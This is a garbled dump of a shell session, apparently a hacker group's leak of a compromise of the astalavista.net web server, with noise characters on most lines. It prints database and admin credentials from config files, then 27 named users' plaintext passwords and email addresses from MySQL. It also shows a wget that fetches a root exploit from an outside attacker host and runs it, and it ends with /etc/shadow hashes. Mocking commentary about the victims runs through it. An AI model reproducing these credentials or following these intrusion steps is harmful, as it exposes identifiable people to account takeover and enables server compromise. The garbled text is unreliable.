( n( b: o+ \( N6 X$ S5 c! e8 Kdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
' f# @2 R7 i/ x! A* e0 w5 Ndrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
1 C4 p7 i0 Z9 m6 Ldrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
$ l7 m8 I6 C2 o" u-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg) B& l: S$ e/ \, Z; l% S
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
% K! ?- K# `4 Fdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
" V" i! c+ q5 Xdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd% H+ \: l! v# P" G6 O! @
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
; q, K8 B$ O; t-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico: I; v3 Z; w/ |: j/ U
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed& ]2 o. j3 r8 |5 Y0 T; ]' m- \1 R
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
3 K( L \& @' H! R9 H2 R: k-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess% }, J, y# S3 i: z- j v! w& n
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
J; P2 J. k' \-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php/ w3 R: |+ ?) |' N
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html* c. {! w; o3 i; z& p0 Q& ^; I2 Q
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
$ m" o0 b+ s o, e3 d" W0 A-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php" }2 S% p4 h5 V9 B- y. b
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
9 t: m# u' }& Pdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc; e( ]0 S# s O! h1 m' s* S5 G
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang" V1 c& t/ A1 f1 Q! `- s- X# z% |
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib& i: U, I0 R' E0 @5 P! l
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
8 R; X X& Q+ m* T4 kdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member2 ^ m! D: d4 F' {! N5 ]; N
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata4 {7 l6 L1 p# `! q3 O- c
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
2 V# U" G3 x$ {' z) t1 D' {- t' A/ r1 {0 B-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf9 q* H4 P) n! }7 n/ d" w6 q! `
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
/ F8 c0 k2 a9 m- c' m2 c9 S-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
3 z k( G2 `, \& r! v! W* V& w* t9 adrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
/ f* t2 O8 e1 W8 ?) Edrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
5 ?8 w8 M" T$ Xdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
3 h( `0 A- O- }0 Z# sdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes* `" O5 N+ K# f4 w9 T. K6 r
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
/ t6 ]- J) Y3 e* H; adrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl1 f, o, F3 b2 Q! u3 k* V
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
5 v6 O/ `# O* rdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old# `. r$ E& Q5 X; q: f) P
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
r* x! K6 _) W5 I/ Ydrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
f+ _6 W+ `! @: W: n
" m5 ~" b; W \2 Tsh-3.2$ head -20 index.php9 I5 ^$ A) T# B% S. X: T/ D# K2 u
<?PHP' A1 m+ D% G; U0 Q% W
/**- s7 S4 V g7 S- ]% V0 Z# p, }( ~
* Mainfile (external) for astalavistaNET v2.0
G0 n5 O D# L; b( B*
' x7 f8 A( i/ }+ K' K* @copyright Astalavista IT Engineering GmbH: X. i5 O2 [6 {7 {8 J, o5 l
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>& `. u. |: W7 p2 O) m- r
* @version 1.0/ Z( D5 r7 o" h8 u, Y5 B3 v, t
*/6 {$ l9 T5 F5 V! y0 Z/ h
3 C( c6 S. J9 U" Q- D9 d
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
; ?/ @1 } s1 J) T $dontStartSession = false;3 E4 u. Q8 @* Z
} else {( O8 V1 I/ u. a. _& A( v' u
$dontStartSession = true;
8 U( {2 Q+ ~) Z. o5 B |! [0 u. x }
/ V) D# k4 E) |/ ]6 s# n0 _ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’); e1 Y8 X& ?! Q2 J6 m: z' a x
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
" k5 M+ }6 L" N8 z6 } require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
3 o6 \% Z6 ~0 L/ } _# X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);% C. p. v% Y1 s @2 b3 C
, e5 ~8 p. T1 s6 D
sh-3.2$ cd config
z/ ?7 ]: w3 B* c* ksh-3.2$ ls -la
- V7 h2 p ?7 } P) H) `" N7 ptotal 32. N) m! k1 S0 K, {/ B
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 ./ L( x* |' b0 U- q; e% C
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; O0 `% ]4 q) N8 B' v/ ]+ Q! V
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php2 t6 v) G2 K" y1 v+ N& U/ R' h
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
4 j: K' L. W' W7 `-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php. O) }# i( c" l. u( f" R
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
8 Q5 A+ g$ i- y' V. u8 j-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php D+ X9 t6 h/ s% t1 b
1 Q6 d' c% N3 o/ S& _sh-3.2$ cat com.conf.php$ {6 R5 T3 K# y1 S
[snip], }/ w. b5 t6 Y+ l; `' u% m7 {
//member-database' D5 C! i' d5 [8 l0 \* w: _
$_CONFIG['db_mem_server'] = ‘localhost’;! Q! F% z3 ~0 F8 m: U; a
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
, o3 E0 U/ s% e$ R$ |$_CONFIG['db_mem_user'] = ‘astanet_db’;$ D6 W6 E6 t h* p9 X
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
$ F! q, U0 f5 a" D$_CONFIG['db_mem_debug'] = false; //true or false: c6 `5 o0 E2 t9 Y' U5 B4 X
//ads-database
' S/ h6 v; ]! T- G* S( u$_CONFIG['db_ads_server'] = ‘localhost’;
2 v+ V, ^+ _$ z! l1 ~" Z. d$_CONFIG['db_ads_database'] = ‘astanet_ads’;8 ?8 v: Y5 r X% C
$_CONFIG['db_ads_user'] = ‘astanet_db’; c! d6 V. `1 O* n
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;8 Y& I9 T# E/ T- ]0 N8 Q
$_CONFIG['db_ads_debug'] = false; //true or false7 }+ C6 i/ U, S
//rainbow-database
: `+ ?+ t& u- B$ B$ r6 D$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
/ g5 N# V& Y1 t4 ?4 W3 p$_CONFIG['db_rainbow_database'] = ‘rainbow’;( Q! T" s9 z9 T# Y8 ~
$_CONFIG['db_rainbow_user'] = ‘dinu’;4 L ^0 O; @) I0 A
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;8 W' M' c- l: B: C( o) q
$_CONFIG['db_rainbow_debug'] = false; //true or false
2 } g: i9 W: I5 p# ^1 O( l' t//mailing lists database9 G% V" \+ J1 p* d! |5 U0 N0 d! K
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
4 k6 ~: ]1 o: F: @/ E k- ]8 D$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;1 }: n$ H; @. y) B7 R( Q
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;% ^0 H0 Z' |/ _/ b j* R" V6 k* ~' }
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;% [3 ~) v. w B; I
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
# P- E* V, S6 T//paypal- H- Q j+ A3 f* W$ T9 F
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;: E6 r) n- [9 f$ q3 x
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
5 c3 \/ [$ r4 q1 I/ s$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
3 @0 v" P3 q* Z- e' s$_CONFIG['sub_pp_noship'] = ‘1′;
% j. c! P1 u. W5 e$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;% Q, ]* j6 V! w, U1 n2 j
[snip]) m1 f+ f! J+ n- x
. N, d& q$ M" X$ J. q! @4 l
sh-3.2$ cd ..
/ B- u" |" `2 Y% j, Nsh-3.2$ cd member' m+ Z1 B. l1 N: {$ Y
sh-3.2$ ls -la
, N. y$ P" Y' }" ~5 Itotal 20* N" g B4 T0 }2 Q) t
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .9 w! O: Z% [8 n6 g1 W: t9 s0 d
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
; G3 O. j- C& h' I7 a" p' A' A-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
1 f* S5 {# S `-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
0 F V) a7 w) \3 o$ R: d1 h4 csh-3.2$ cat .htaccess
% a, q0 M- N. P, W8 J5 SSecFilterEngine off
, H4 g/ F6 _: h$ R% S2 f! r) [) e! F3 J4 r4 @. G0 \
sh-3.2$ cd .. F: H: k" B5 h1 a
sh-3.2$ cd cron
* r+ x9 L" l3 L0 D+ b/ ksh-3.2$ ls -la! O; [& Q6 z( s! _/ ~
total 1684 a) _9 p. L5 ?7 ]! r9 e
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .& f( {7 r- G' s6 f- L v B
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 O A0 s3 i3 S5 n
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
/ e+ b9 i" c8 U4 U/ F" Y& Y-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
1 c: u3 p& b& ~4 r8 ~-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php7 C# e# `7 u& K. h, g/ M: B' g
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
1 X/ h2 ?% g: ~" {$ M-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php! Q1 S; l4 f2 i x0 |2 J$ k
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
6 B9 N: {( w6 ~9 C: X1 h-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php! o( C7 D+ Q* `) F; h& Q- b
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php+ p' z2 W& G5 j, V" \1 L
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh0 d* Z n& ]# ]
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php* x# u1 A2 f+ m8 ?. k2 B2 _/ j' m
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
& x/ P6 F: b- F% A-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
8 S/ v' t) c; W) I3 f$ R& S' \4 U-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh2 g4 X# ?. W1 k6 ?3 T% Q
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php! ~" s0 k% X9 T* W; f8 |
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
# f+ J% ]% n% y- {' A L-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
: e' c. ?* K5 ], \5 D; U9 u-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php/ s, L! j( A, x7 u4 Z
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
& [: }+ S. m3 Y5 t9 xdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
9 x& N% Z0 x! k-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
/ W' I/ X) m# E, _, y9 ?-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
: Y/ T3 n' y$ U
# L' }/ b. i A: S- y/ Fsh-3.2$ cd ..
1 J% @4 Z" L1 O8 O& ]$ ush-3.2$ cd _007
% e# a( T* P h) @sh-3.2$ ls -la# H) B2 S6 B9 n9 \+ Y& D( k# P
total 24
6 I5 o& s2 T- I) U# {) sdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
" l ~0 _$ a2 o* N$ Bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ../ A; s3 w2 l* D
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess# a4 y& ~& h' i/ c/ N: b/ }% W; ?- ]
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
; P% T% J1 }# s$ @" S-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
: S# [7 b+ k. mdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
2 c% p8 _& U8 ]; d% G6 t2 A, q" R0 e Z! r" S
sh-3.2$ cat .htaccess, I4 Z. S6 {% j* u1 V
authType Basic
5 L% ?% g5 \% u6 F" mauthName Admin
; o! ?% W8 z) R2 {6 Y, [authUserFile /home/astanet/auth/.htadm_pwd
) M2 c: ^% O6 [8 Y" trequire valid-user
8 K0 x9 X% u3 j, d+ }1 m, b4 @
6 c) Y# Q- I2 U, q6 o+ D) Dsh-3.2$ cat /home/astanet/auth/.htadm_pwd7 t/ ]8 [6 |0 l9 B* c
admin2net:CR0bl65MwhfT' s# c+ } \$ P i1 V5 D
: b4 e8 U: a& P! M2 k9 p4 P: t. msh-3.2$ mysql -u astanet_db -p1 ^: `/ U/ f/ E% f
Enter password:
# ?; l5 X- i5 A+ f, U# [* x: pWelcome to the MySQL monitor. Commands end with ; or \g.
; ~; A @5 r' F; c) ~7 u% EYour MySQL connection id is 275153
9 M: d1 a- d! N8 ]6 HServer version: 5.0.45-community-log MySQL Community Edition (GPL)+ h- @* Q. T# E5 V
" U: O! j( W3 U+ I/ p# L( l& C
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.3 q7 t4 F6 X1 g- k& _8 u
( l# ~2 R8 ^; A7 P: ~ Smysql> show databases;
9 O8 R8 }* t- |2 V% ]. q+———————–+
3 _2 P: M! L" B4 @8 u, `0 \| Database |: f) x8 D8 l( a/ {1 h0 q
+———————–+. Z; j- `5 t& y+ s
| information_schema |* g" L0 G- K, ]: G
| astanet_ads |
7 U( Z K6 M+ ~4 s8 L" t! || astanet_mailing_lists |6 L/ n, J0 o. M/ ^/ P
| astanet_mediawiki |* S9 v7 Z1 w2 x' ^
| astanet_membersystem |( j$ K$ O4 U) ?- n
| test |" J6 h% }! c# N# @
+———————–+
$ ~3 D' x6 c0 b+ Y' Z6 H6 rows in set (0.00 sec)
, [8 L" Z; R0 u& k4 }) p# S
3 W/ K+ x: P4 {" v2 l- Lmysql> use astanet_membersystem
: l8 F* |; s5 e! g; HDatabase changed
3 X1 D. i: Y! s0 g# l0 a# u w& G; L# fmysql> show tables;
0 J2 q& Y) u% n2 Q+ T+———————————–+0 a. X5 Q* b6 L
| Tables_in_astanet_membersystem |8 C$ P; H" v& h5 p6 n1 P7 y, h
+———————————–+/ R! o, K1 l. E7 \( k0 s1 R
| blacklist_categories |6 R Z$ \8 h& c$ C# f
| blacklist_content |
7 b% M j" Z, ?| blacklist_levels |* E6 C: k, O7 w9 G( ~7 u1 b
| blacklist_mcset |
# a `" ]6 f9 q) y| dir_categories |* _" b' a0 H4 k9 ~1 R4 x( T& r
| dir_comments |
$ L( G* k/ Q) V9 ~' B6 Q| dir_links |, B" o7 ]( X* e X1 C' f7 I
| dir_temp |
) `: C& i7 o( V: A+ w| dir_votes |
! I8 T- ?$ @$ x( o) s| documents |' R1 [ Z& I3 N( A- t3 _+ m) ]
| documents_categories |
. B7 S: R. W6 V) w5 A| email_content |/ E1 ^6 H0 q n8 w* {
| email_settings |
. m8 ~" y+ M( S8 ^' l| exploits |
1 K1 W8 D5 F; |# {# M. ]| exploits_categories |
, n$ C' z: W: O8 H0 G9 l) {| exploittree_categories |
# e% `4 {( q2 O5 V% V5 `* s4 M| exploittree_exploits |) Z/ f2 w4 F |0 W+ N; d) V* P
| home_values |7 Y; {3 P6 C" c b$ P
| iso_countries |
# ?8 [1 g7 x& k* o| links_categories |$ V5 ], v) C7 [& \
| links_records |
* }4 y/ M: o; w| links_unauth |9 B; a! `* K1 n" W1 r0 S& R
| links_votes |
" [8 [' |- ^9 |/ z. E| log |
) a5 S1 B9 A/ ]$ y+ f| news_categories |
0 q; p1 [7 p, a. r| news_comments |/ c1 p9 w5 v6 U2 x- G4 K0 ~2 { m
| news_emoticons |' {( k+ O' v/ D( X9 Z5 T
| news_latest |
: v% H: ^( r7 f! H t+ v| news_messages |
( i: u- L! ]$ |: R; A6 D1 g0 c| news_statistics |4 |( d5 y: p4 m. |3 \2 k
| news_votes |
' f Q+ C) h( D) h| prices_content |
, H# m+ T; W/ a& l| prices_offers |
1 W- _" b) w$ c# F1 |9 S; x| rss_settings |4 f! v0 R1 V* e& c
| sessions |% J/ N* e4 P' L. I$ n \9 G
| stats_signups |( C! f5 X/ s( |, w- w% A& R4 l6 `5 z
| u2u2 |& a: L/ X; ?( K; E( i1 c
| u2u_contact |+ j S& h& p4 ~# e3 l. E
| u2u_settings |* p; z9 c( Y0 \' D5 f
| user_keywords_selected_categories |
% S# s* Z6 B+ ]. { B| users |
& \8 G0 s! j5 K| users_ipn_test |( @' w" J- G. {7 z% {' y
| users_keyword_values |9 D7 g O+ D: [
| users_profile |; V4 _0 @7 V! b$ d
| users_temp |% n5 T/ z) x. J
| users_upgrade |) h, L o2 T9 x( r2 z0 a* L
+———————————–+
7 C4 T9 T5 A/ T* Z46 rows in set (0.00 sec)3 O6 e5 W" Q$ \ {2 N2 I5 g
) g& v% A, w6 i' W& m) qmysql> describe users;
3 u; w6 v/ j+ Q, Z) C, B5 i" u+————————–+————————————–+——+—–+———————+—————-+3 X# k. N* O8 w9 F- Z
| Field | Type | Null | Key | Default | Extra |
2 i. e/ v# Z1 ?: b+————————–+————————————–+——+—–+———————+—————-+
1 e: E) b* r; Y6 C, R9 N# G2 L; j6 y| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |5 e+ p6 c9 V, _5 W
| user | varchar(50) | NO | | | |
7 v2 u( u- I) m% f8 u. m( ?5 _8 s) M$ a* h| nickname | varchar(30) | NO | MUL | anonymous | |* D, K* _. J2 h: d: D+ X- H
| password | varchar(30) | NO | | | |
0 u1 D8 T- l) d) @| userlevel | tinyint(3) | YES | MUL | NULL | |
5 |' N$ x$ G# {3 f+ U. x| exp | int(8) unsigned | NO | | 0 | |3 Z2 o/ c$ b9 y; y5 f
| email | varchar(50) | NO | | | |3 X6 X" l1 w& B2 M7 m: j, n
| ip | varchar(15) | NO | | 0 | |
% n+ M# t0 w6 q8 u' n' @, N| proxy | set(’0′,’1′) | NO | | 0 | |6 S+ V2 f5 X7 I8 ~7 l
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |3 ]7 D6 Y" _! N3 B" N1 ~$ \
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |3 h# Q& F2 h' M6 i& v; S, u* Z$ d
| anz_in | tinyint(1) | NO | | -1 | |5 ~8 O# i3 V% K
| status | tinyint(1) unsigned | NO | | 0 | |0 d# m, @+ x, N1 N1 Q
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
?" [3 n2 L/ ?/ r/ a/ L6 Q! i| freemember | set(’0′,’1′) | NO | | 0 | |
* d! x; ~; V9 Y) ^2 _" C| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |+ P$ W3 V" F6 i \; i) ]
| lang | tinytext | NO | | | |
8 X: Y# T& M7 H2 l8 F6 `) n| adid | smallint(6) | NO | | 0 | |
' S; {6 w1 m. o8 o6 b0 C: ]2 J0 X& U' Q| pp_txn_id | varchar(255) | YES | | NULL | |; k# l) j8 O. f3 h& r: z
| cnb_transaction_id | varchar(255) | YES | | NULL | |
3 G% E) n. c' I1 o$ h) _: n| cnb_order_id | varchar(255) | YES | | NULL | |2 h- }) [& x: s- g' D: ]& U
| cnb_user_id | int(11) | YES | | 0 | |
I% V( `, L4 x% D) S1 _+————————–+————————————–+——+—–+———————+—————-+
, o( G h% l$ R& W1 t0 h3 s; ^22 rows in set (0.01 sec)
3 ~! i- B% p# Y# ]. ~
% U, R c) l; \" zmysql> select count(*) as skids from users;- J1 a9 s2 G. U8 D- q; D: q' j' ]
+——-+
! ?3 M' }/ C3 ]| skids |) `$ e5 }6 T. _4 b: F2 Z$ ?. ]
+——-+
! ]1 {! F# T# W| 25199 |8 i6 Y# B/ u- g+ l9 G! r: d# E
+——-+
% H. D* i7 p: w8 M4 N1 row in set (0.00 sec)
1 S1 F" a8 R0 l5 G5 N& ]- g/ d9 S1 W! C! q% t4 q4 P( Z# C: {
mysql> select user,nickname,password,email from users where userlevel = 1;
% r" R3 U% s7 A. Z" c+————————–+———————-+——————+———————————–+- g& M: j; ~ Z8 d
| user | nickname | password | email |
: U. S7 L' [0 U4 H" Y8 J+————————–+———————-+——————+———————————–+
1 g M: b8 e4 l" N| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
4 X) b/ f. v# ]; ]" J! k$ x| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |# U1 H& K3 ?! ]6 n7 ?, V0 ]
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |5 Y" ~# d9 O6 j# A9 W; J0 _ r8 ^
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |: v$ C, u5 f' B1 n
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |* V! C1 ?- s G& @# B
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
/ i# O6 H- b. O, {, S| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
* a2 N X+ K( c- T| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
4 T/ H- Y- E8 H4 K6 z% g: o/ E! v! || Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |3 E9 n6 Q2 q9 u% R1 X
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
5 Y+ H& x7 x* Q v# I9 @) F1 x; k# a| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
l b4 T- Y' D0 J* n5 i v1 P| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |: y! g. ?/ N5 H: r1 J0 N
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
/ K" ^ P' p; y, O! J; T ?: }| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
9 \: ]; |* a5 V7 _# r| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |& R; Z( v6 @' F1 V w& }' P
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
( D1 M# n1 F+ G/ u6 s/ Q| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |5 p. j0 t5 ]- p ]! ?3 G; R
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
( e+ A [5 v0 {0 l( x| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |' p+ H6 y7 |8 s- i5 j1 J
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
7 X, c t6 R! l1 H4 Q| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |! z% J' s* b8 o2 c$ A
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
$ k n% `5 h' g, T| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |' ]. A% D1 }6 L. G
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
# Q% A0 W. W1 \, U( E; }| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
4 y( ?; z+ C2 |& H7 E. g' S| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
* e8 f/ G: L) J) m: Z4 O| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |. Q" d; S8 E5 b4 }7 k
+————————–+———————-+——————+———————————–+
: n: u' o5 C2 ^( D& Y27 rows in set (0.00 sec)' j( m. C4 A" v, ~# k+ Z) f
~; m4 T, W9 p3 |0 k
mysql> exit;+ D Q5 X. g7 d; w7 f9 R
Bye5 Q$ \, M* \7 j% q$ R# h) H7 A: R
7 ?0 j2 v6 T/ c5 C[~] plaintext passwords? yes,0 e6 o5 ]3 q- D
Those so called “security professionals” who charge you $6.66 / month to5 ]( |* E4 f1 M$ k, C! \
register at their hack-proof portal, save your passwords in plaintext…/ a) A( I% K( ]% p& @2 ^) K
brilliant!
/ t9 I: n3 @" H# R, m
4 \0 O {, V6 A# t* M[~] This been fun but we want more.' }& [: Y% z( }9 q( b5 p. N- E3 A, P
# u q$ J* J! [2 ^0 z8 m. @7 L# U: D
sh-3.2$ uname -a# m$ ~& V' L5 d8 d$ @
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
/ X" O9 H% n g" e m# \- csh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
% T+ t& o- ? u; z+ k/ \–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
) t- \( {+ x& d9 b3 E* |0 {Resolving anti.sec.labs… 13.33.33.37
; U8 y& n9 K8 B5 t* s- a7 i+ TConnecting to anti.sec.labs|13.33.33.37|:80… connected.
, T3 L# t, e& @HTTP request sent, awaiting response… 200 OK. H7 T7 f2 }8 Q* k5 v( U3 B
Length: 18200 (18K) [text/plain]2 T$ _2 | n, E! c! y
Saving to: `g0troot’
6 l/ U8 |( D' i9 g8 B. I$ h5 p% p5 O& h8 o5 ^
100%[=========================================================================================================================================>] 18,200 58.6K/s in: H# R- T6 v; `# v3 W( ?8 J
0.3s0 F1 K' \& c1 x6 u2 Q) }& E2 ]
2 w& _4 D: C- r8 }18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
( w9 h1 I+ @ b
9 o3 z( u- ]- A ?0 tsh-3.2$ ./g0troot -i x86_64
& w7 ^" J3 }+ a& [[+] g0troot - anti.sec.labs
6 z; @+ S3 ]9 |& l, \. Q6 r4 R[+] Target: 2.6.18-128.1.10.el5
4 t0 `& y, d" V7 u/ S[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
0 T! _+ ^ V$ s v D. H9 v; j- U: X( p
9 [' Q/ }( a' T( S& [[+] r00tr00t
# ~% Y7 q, r8 [+ M[~] Executing shell…. [/ h2 R, `# r5 k1 C
* q& m" {7 @( Z2 l$ S
sh-3.2# id* M4 l- H. C* [( t1 O+ ^
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
, H3 p- _$ E* U1 v# t
* E! U9 w+ B. K' Qsh-3.2# cat /etc/shadow
0 G9 ~4 B* [# |$ m0 F1 r: kroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::' h: L/ V5 c& J8 ?/ u! E/ q9 F
[snip]
4 ]2 Q! |" [5 \! A9 tadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::! o0 r; t8 ]. W. o: d* V
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
6 H$ h/ k5 a$ @! Wcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7::: k. Y, B3 t$ G% }! _0 M
